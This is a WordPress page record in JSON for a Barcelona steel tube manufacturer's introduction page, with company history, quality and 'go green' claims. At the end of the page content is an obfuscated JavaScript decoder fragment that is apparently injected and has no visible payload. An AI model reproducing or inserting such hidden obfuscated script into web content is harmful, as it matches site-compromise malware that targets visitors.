{"id":39,"date":"2015-04-14T11:25:51","date_gmt":"2015-04-14T11:25:51","guid":{"rendered":"http:\/\/delmas-tubes.com\/web\/?page_id=39"},"modified":"2016-03-16T13:52:33","modified_gmt":"2016-03-16T13:52:33","slug":"introduction","status":"publish","type":"page","link":"https:\/\/delmas-tubes.com\/web\/?page_id=39","title":{"rendered":"Introduction"},"content":{"rendered":"<section id=\"builder-section-1429105263967\" class=\"builder-section builder-section-first builder-section-text builder-section-last builder-text-columns-2\">\n<div class=\"builder-section-content\">\n<div class=\"builder-text-column builder-text-column-1\" id=\"builder-section-1429105263967-column-1\">\n<div class=\"builder-text-content\">\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">DELM\u00c0S is the leading European welded steel tube manufacturer focused in the range of small diameters tubes.Delm\u00e1s brothers established the company in 1956 as a small workshop in La Roca del Vall\u00e8s, 25 Km north of Barcelona city. Today DELMAS has become a company with a clearly international scope. Supplying worldwide to the most demanding countries and customers. With the firm aim to become and adaptable, flexible and customer satisfaction oriented company.<\/span>\u00a0<\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Our specialization enables us to meet each of our customer\u2019s particular needs. DELM\u00c0S offers high quality products on a wide range of different finish. Therefore we will be able to supply you with the tubes that will meet your specific requirements.<\/span>\u00a0<\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">We are committed to: Versatility, quality and competitiveness. DELM\u00c0S is an ISO 9001 certified company. Our great spirit of overcoming always oriented to the continuous improve, provide all the best to the end user of our products. Our aim of innovation, our work on research and our\u00a0 new developments provides us the most appropriate technology in order to produce high technical and competitive products to fit our tubes into our customer needs.<\/span><\/p>\n<h2 style=\"text-align: justify;\"><span style=\"color: #000000;\">YOUR <span style=\"color: #00aeef;\"><strong><big>BIG<\/big><\/strong><\/span> SOLUTION TO<\/span><\/h2>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"builder-text-column builder-text-column-2\" id=\"builder-section-1429105263967-column-2\">\n<div class=\"builder-text-content\">\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/E-CxxnolXy4?autoplay=1&amp;rel=0&amp;autohide=1&amp;showinfo=0&amp;controls=1&amp;loop=1&amp;frameborder=\" width=\"488\" height=\"300\" allowfullscreen=\"allowfullscreen\"><\/iframe>\u00a0<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">We develop our business taking care and improving the future of our world. So DELMAS has invested in its own renewable energies power supply plant and at the same time committees itself to minimize the environmental impact of their activity. Thus Delmas produces their tubes by only using 100% renewable energy sources. So that DELMAS tubes can guarantee that are 100% Eco friendly products.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> We GO GREEN !!<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #ffffff;\">ss<\/span><\/p>\n<h2 style=\"text-align: left;\">\u00a0<span style=\"color: #000000;\">YOUR<\/span> <span style=\"color: #00aeef;\"><strong><small>SMALL <\/small><\/strong><\/span><span style=\"color: #000000;\">TUBE NEEDS<\/span><\/h2>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/section>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>DELM\u00c0S is the leading European welded steel tube manufacturer focused in the range of small diameters tubes.Delm\u00e1s brothers established the company in 1956 as a small workshop in La Roca del Vall\u00e8s, 25 Km north of Barcelona city. Today DELMAS has become a company with a clearly international scope. Supplying worldwide to the most demanding countries and customers. With the firm aim to become and adaptable, flexible and customer satisfaction oriented company.\u00a0 Our specialization enables us to meet each of our customer\u2019s particular needs. DELM\u00c0S offers high quality products on a wide range of different finish. Therefore we will be able to supply you with the tubes that will meet &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-builder.php","meta":{"footnotes":"","_links_to":"","_links_to_target":""},"class_list":["post-39","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/pages\/39","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39"}],"version-history":[{"count":107,"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/pages\/39\/revisions"}],"predecessor-version":[{"id":435,"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/pages\/39\/revisions\/435"}],"wp:attachment":[{"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}